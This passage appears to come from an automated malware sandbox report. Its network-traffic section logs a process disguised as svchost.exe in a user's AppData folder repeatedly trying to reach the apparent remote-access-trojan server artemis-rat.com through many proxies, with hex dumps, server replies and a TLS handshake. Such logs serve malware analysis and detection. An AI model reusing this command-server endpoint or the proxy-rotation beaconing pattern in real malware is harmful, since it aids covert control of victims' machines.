                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.787712097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.378307104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2268192.168.2.55607085.172.15.98808343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.522849083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.380223036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.941323042 CET19INHTTP/1.1 200 OK


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2269192.168.2.557206157.185.157.1512658943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.528768063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2270192.168.2.557065103.190.54.141808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.529058933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.905558109 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2271192.168.2.55713241.77.188.1318043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.534022093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.205785990 CET536INHTTP/1.1 500 Internal Server Error
                                                                                    Date: Sat, 09 Mar 2024 12:14:31 GMT
                                                                                    Server: Apache
                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                    Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                    X-Content-Type-Options: nosniff
                                                                                    Content-Length: 597
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was una
                                                                                    Mar 9, 2024 13:14:31.205987930 CET372INData Raw: 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20
                                                                                    Data Ascii: ble to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this erro


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2272192.168.2.557130222.220.102.159800043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.563122988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.951611996 CET536INHTTP/1.1 500 Internal Server Error
                                                                                    Server: openresty
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 576
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21
                                                                                    Data Ascii: <html><head><title>500 Internal Server Error</title></head><body><center><h1>500 Internal Server Error</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page --><!


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2273192.168.2.5572245.161.231.348043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.564673901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.820349932 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2274192.168.2.557231162.240.22.1844802643312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.565213919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.145818949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.833669901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.146142960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.536746979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.833736897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2275192.168.2.557286104.19.120.848043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.592411995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.748123884 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2276192.168.2.557301172.67.182.778043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.599977016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.755772114 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2277192.168.2.557149116.199.168.1414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.601289988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2278192.168.2.557200107.181.148.227608743312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.603025913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.896173954 CET459INHTTP/1.1 407 Proxy Authentication Required
                                                                                    Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization."
                                                                                    Proxy-Connection: close
                                                                                    X-Webshare-Error: 407
                                                                                    X-Webshare-Reason: invalidpassword
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Content-Length: 121
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e
                                                                                    Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2279192.168.2.557323104.25.194.1758043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.611287117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.765674114 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2280192.168.2.557195136.243.82.121108243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.619343042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.004199028 CET84INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Transfer-Encoding: chunked


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2281192.168.2.557193213.202.230.2418043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.621320009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.940265894 CET76INHTTP/1.0 200 Connection Established
                                                                                    Proxy-agent: Apache/2.4.52 (Ubuntu)
                                                                                    Mar 9, 2024 13:14:29.940764904 CET369OUTData Raw: 16 03 03 01 6c 01 00 01 68 03 03 65 ec 52 a4 d7 d9 9d 94 75 1f 7c 4f ef 4c 2f 26 72 58 e5 11 5d f5 e1 e7 e3 21 46 83 d8 6c 1d 17 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                    Data Ascii: lheRu|OL/&rX]!Fl*,+0/$#('=<5/artemis-rat.com#4M;paT?&\19~mhvlPH,
                                                                                    Mar 9, 2024 13:14:30.259495974 CET1286INData Raw: 16 03 03 00 43 02 00 00 3f 03 03 65 ec 52 a6 27 b0 29 91 82 ce 95 20 e6 d1 9b 70 8e 5f 9a 01 a5 48 1c 30 44 4f 57 4e 47 52 44 01 00 c0 2f 00 00 17 00 00 00 00 00 17 00 00 ff 01 00 01 00 00 0b 00 02 01 00 00 23 00 00 16 03 03 10 6b 0b 00 10 67 00
                                                                                    Data Ascii: C?eR') p_H0DOWNGRD/#kgde0a0I?LR0*H0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P50240214225240Z240514225239Z010
                                                                                    Mar 9, 2024 13:14:30.259504080 CET162INData Raw: 98 6e 71 f4 11 ac 4d b8 a7 7d 6f da c6 bc f4 b1 9e 56 4d 29 6b 80 18 2b 54 cc 2f af 96 ce 21 d1 4a a2 d6 af dc dc c3 23 73 8a f8 60 aa 82 11 8f 73 e6 dd de ff f1 c4 74 75 19 89 f2 11 f3 81 b3 5c 09 1f 05 21 66 f5 dc f5 01 c2 34 dc e1 8e 2b 77 c7
                                                                                    Data Ascii: nqM}oVM)k+T/!J#s`stu\!f4+wF3yO3RDw.QJRh8?hXZR`UHG3XF%~ t\5
                                                                                    Mar 9, 2024 13:14:30.259610891 CET1286INData Raw: 7c f0 30 c1 81 dd bd 46 3c 84 41 91 c0 f9 72 70 be e9 27 7e 00 05 90 30 82 05 8c 30 82 03 74 a0 03 02 01 02 02 0d 02 03 bc 50 a3 27 53 f0 91 80 22 ed f1 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 47 31 0b 30 09 06 03 55 04 06 13 02 55 53 31
                                                                                    Data Ascii: |0F<Arp'~00tP'S"0*H0G10UUS1"0 UGoogle Trust Services LLC10UGTS Root R10200813000042Z270930000042Z0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P5
                                                                                    Mar 9, 2024 13:14:30.259740114 CET1286INData Raw: 67 99 90 77 37 0a 97 2d c5 1c 1e f4 d0 5b e9 15 e3 ea 02 09 c8 13 d7 13 70 65 bf fb 88 9b 5a 25 be 77 09 e1 a7 6a 4e 11 75 b9 1e 4d f1 00 1b 6a 66 79 8e c3 6e d8 6d a2 22 a2 6d 05 fb 2c f2 f1 50 e5 a0 d1 d8 9f 35 7d fc 70 ab 59 2a 02 f1 be b0 d3
                                                                                    Data Ascii: gw7-[peZ%wjNuMjfynm"m,P5}pY*j%[ @4 awHI)adcGF9sO+Xe Uon=zcmf0b0Jwl6!X0*H0W10UBE10UGlobalS
                                                                                    Mar 9, 2024 13:14:30.259937048 CET574INData Raw: 82 01 01 00 34 a4 1e b1 28 a3 d0 b4 76 17 a6 31 7a 21 e9 d1 52 3e c8 db 74 16 41 88 b8 3d 35 1d ed e4 ff 93 e1 5c 5f ab bb ea 7c cf db e4 0d d1 8b 57 f2 26 6f 5b be 17 46 68 94 37 6f 6b 7a c8 c0 18 37 fa 25 51 ac ec 68 bf b2 c8 49 fd 5a 9a ca 01
                                                                                    Data Ascii: 4(v1z!R>tA=5\_|W&o[Fh7okz7%QhIZ#+IjuXHW5oo*Ni-h+s"7fIUg2&p=gm=|42njoK;7D~lF!fUl)f[wIH(3rS5b$
                                                                                    Mar 9, 2024 13:14:30.261945009 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 4a 25 fb 95 b7 3b a7 06 21 70 99 3f e7 c1 51 ea 99 99 a3 d9 18 64 bd d8 b3 a1 9f 4e b3 3f 03 0b 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 92 44 16 3c 92 d2 a0 36 b3 9e 54 4e 84 d9 8f da cb cb da a3 2b
                                                                                    Data Ascii: %! J%;!p?QdN?(D<6TN+@
                                                                                    Mar 9, 2024 13:14:30.580472946 CET258INData Raw: 16 03 03 00 ca 04 00 00 c6 00 00 fd 20 00 c0 ef f1 5c 83 12 d8 e4 38 e5 74 fc a1 e4 f1 c9 5b 71 3b 37 0c a2 e2 39 6b 8e af 67 af bb d9 ad 46 90 9c e5 fb d7 a2 4b f5 e0 bf d4 ea 04 8f 4c 93 9c 24 c7 17 d1 b1 22 63 a4 9e 7b 8d b9 00 ec 9f 2a 26 e4
                                                                                    Data Ascii: \8t[q;79kgFKL$"c{*&?BG:Ops<eM^&J>DgN'QdZ9}->7pk!Q)vh=:A(5W,]E EbZ7p[`y(1s<{#3
                                                                                    Mar 9, 2024 13:14:30.644458055 CET252OUTData Raw: 17 03 03 00 f7 00 00 00 00 00 00 00 01 88 28 81 72 39 5e b7 fa 46 a7 d7 6b 9b 67 68 4e d2 e3 09 28 a1 74 bf 4d 22 b1 8f 1a 31 12 d4 fb ff 31 d5 7e 85 d1 d4 61 f4 f1 e4 1f b3 a4 8e e1 60 c8 9c 4a 20 e1 fa e4 40 de 80 9f 2b b0 eb ae ab 11 73 18 35
                                                                                    Data Ascii: (r9^FkghN(tM"11~a`J @+s52;B'pTd]UORVm.(`x4mh*lpRs$Cx'qg-JRjL69;y#yc[HrAe`bN<YMx?!r.Pah?TbS0;w
                                                                                    Mar 9, 2024 13:14:30.964256048 CET1286INData Raw: 17 03 03 05 71 00 00 00 00 00 00 00 01 02 02 2d 1a b3 2e 8d 64 ea 43 72 68 d7 2e be e6 71 71 4e 75 89 1d 14 95 cb 5c 78 ff e6 83 e8 92 c0 92 dc df cc d7 ca 9a 2e bd 68 d5 72 12 6c 67 0e 15 3f a7 15 c0 d9 22 c4 c1 34 58 6d 92 79 77 17 51 61 6b d4
                                                                                    Data Ascii: q-.dCrh.qqNu\x.hrlg?"4XmywQakJk>@iB'F*a4ZiV.O>"3y@A=CX@b9*4zCo>p!C+^ Q,'25kIw?3d6qo9l1iq"Qm93


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2282192.168.2.55722545.43.81.164581143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.626682043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.914021969 CET459INHTTP/1.1 407 Proxy Authentication Required
                                                                                    Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization."
                                                                                    Proxy-Connection: close
                                                                                    X-Webshare-Error: 407
                                                                                    X-Webshare-Reason: invalidpassword
